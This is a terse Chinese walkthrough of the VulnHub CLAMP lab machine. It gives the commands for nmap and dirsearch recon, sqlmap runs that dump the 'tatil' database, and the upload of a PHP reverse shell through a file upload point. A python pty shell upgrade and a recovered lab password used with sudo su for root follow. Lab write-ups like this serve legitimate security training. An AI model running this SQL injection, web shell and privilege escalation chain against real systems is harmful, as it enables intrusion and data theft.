https://download.vulnhub.com/clamp/CLAMP-Machine-v1.0.1.zip
nmap -sS -sV -A -p- 192.168.31.156
dirsearch -u http://192.168.31.156
查看源码
提示让收集更多信息
下面是一些判断题,对与错对应1与0
最后结果为0110111001,拼接访问
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --random-agent --batch
测试数据库
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --random-agent --batch
查看tatil 下表名
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" -D tatil --tables --random-agent --batch
获取gereksiz的数据
sqlmap -u "http://192.168.31.156/nt4stopc/0110111001/summertimesummertime/go.php?id=1" -D tatil -T gereksiz --dump --random-agent --batch
拿到一串加密值
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
拼接访问
再拼接 upload.php
得到一个文件上传点
发现没有提交按钮,自己在前端给加一个
locate php-reverse-shell.php 查询
cp /usr/share/webshells/php/php-reverse-shell.php . 复制
vi php-reverse-shell.php 编辑
上传该文件后,返回了文件路径,文件名为md5加密后的
osas/2ad6bded962b884337eaeb921d7c2764.php
访问文件,成功反弹shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
查看文件,发现内容
url解码,得到账户密码
mkelepce:mklpc-osas112.
直接sudo su提权
提权成功!!!